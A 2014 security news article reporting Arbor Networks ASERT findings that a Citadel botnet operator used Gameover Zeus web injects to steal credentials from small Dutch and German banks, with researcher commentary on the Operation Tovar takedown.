Security researchers at Arbor Networks' ASERT division reveal in a new blog post how the cyber-criminals behind the Citadel campaign, which was taken down by Microsoft in June 2013, are now using a tweaked variant of the botnet alongside the Gameover Trojan to target a number of small European banks.
The threat actor behind Citadel can get a campaign started by buying builder software, building the malware and then distributing this into the wild to infect machines and make a profit. A log-in key in the Citadel code reveals a specific copy of the builder, and the key is copied into generated binaries so that a link between the malware and malware builder is known.
However, a key question is now being asked on how the Gameover Trojan – a favourite tool used by hackers against financial institutions – is still in operation.
Earlier this month, the FBI, NCA, Europol (EC3) and various other law enforcement agencies clubbed together in the ‘Operation Tovar' to disrupt the Gameover Zeus and CryptoLocker botnets, which were being used to infect some 500,000 PCs.
The agencies subsequently took control of Zeus' peer-to-peer (P2P) infrastructure, but didn't rule out the possibility that the same cyber-criminals would have moved onto new infrastructure within four to six weeks.
Investigative reporter and independent security researcher Brian Krebs suggests that “the curators of Gameover also have reportedly loaned out sections of their botnet to vetted third parties who have used them for a variety of purposes”, and this appears to be backed up by ASERT's findings.
“Analysing webinject data from the global configuration file that was being distributed on the peer-to-peer network shortly before its takedown on June 2, 2014; it looks as if the threat actor behind Citadel log-in key 5CB682C10440B2EBAF9F28C1FE438468 had joined the ranks of Gameover's coveted third party,” reads the analysis from ASERT security researcher Dennis Schwarz. “Checking historical versions of the config show that this collaboration goes back to at least January 2014.”
Crucially, this builder key was not associated with the 82 parties accused in Microsoft's Citadel lawsuit last year.
The company adds that the threat actor has modified the Citadel code to work with Gameover and to target “a small set of banks in Netherlands and Germany” and suggests that the group may have moved onto Gameover to steal bank credentials in late 2013, when Citadel activity was in decline.
In this latest case, Citadel's core code remains the same, but the web injects have been changed.
“So far, it seems as if this threat actor has escaped the clutches of the great Citadel take-down and, since the drop site is still receiving stolen credentials, has evaded the Zeus Gameover take-down as well.”
Schwarz added in an email to SCMagazineUK.com: “While the exact details haven't been released, I speculate that Operation Tovar took over/took down the domain generation algorithm (DGA) component and a set of, in Gameover parlance, super nodes or proxy nodes. Among other functions, these special nodes were the main channel for funnelling stolen banking credentials to the threat actors,” he said.
“What I found interesting from the third-party campaign mentioned in the blog is that it used an out of band channel (built into the particular set of web injects referenced) to exfiltrate stolen data--outside of the main conduit. This secondary channel was definitely still collecting stolen credentials from victims infected with Gameover post-Operation Tovar on June 2.
“One of the reasons why Zeus based malware is so popular is that web injects can be retrofitted from one variant to the next fairly easily. Based on the web injects mentioned in the blog, I believe this particularly threat actor was using both Citadel and their relationship with the Zeus Gameover crew to target the set of banks in the Netherlands and Germany.”
Kenneth Bechtel, malware research analyst at Tenable, said that this latest case is a classic example where takedowns can't keep up with the new strains of malware.
“Considering that malware is often used as a profit centre, this development comes as no surprise,” he said to SCMagazineUK.com.
“Major takedowns such as the Citadel campaign and even Zeus net have had positive results. However, with the sheer volume of variants being controlled, it is no real surprise that a few very small organisations were targeted, slipping through the cracks.”
“Since this one has popped up on someone's radar, I'm confident it will be dealt with quickly. Dealing with malware and botnet Command and Control (C&C) is very much like playing whack-a-mole: while the industry does its best to be proactive, we cannot predict what server will be compromised next and leveraged for C&C, and can only react accordingly. As long as malware is being sold on the black market and used as a profit generator, we will continue to see this type of one-off attack.”